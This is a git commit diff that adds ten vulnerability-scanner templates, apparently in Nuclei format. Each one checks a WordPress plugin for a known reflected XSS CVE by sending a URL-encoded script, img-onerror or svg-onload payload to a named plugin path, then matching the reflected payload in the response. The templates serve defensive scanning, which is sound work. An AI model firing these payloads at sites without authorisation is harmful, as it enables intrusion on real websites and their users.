New merged templates
parent
80c791830b
commit
d75d21afe5
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-17043
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2017-17059
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
|
||||||
|
reference: |
|
||||||
|
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
|
||||||
|
|
||||||
|
body: "amty_hidden=1"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-17451
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-18536
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
|
||||||
|
reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<img src=x onerror=javascript:prompt(123)>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-9288
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<img src=x onerror=alert(123)>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-11709
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
|
||||||
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-20462
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
|
||||||
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-5316
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
|
||||||
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2019-15713
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
|
||||||
|
reference: |
|
||||||
|
- https://wpscan.com/vulnerability/9267
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
|
||||||
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<svg/onload=confirm(123)>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2019-16332
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
|
||||||
|
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue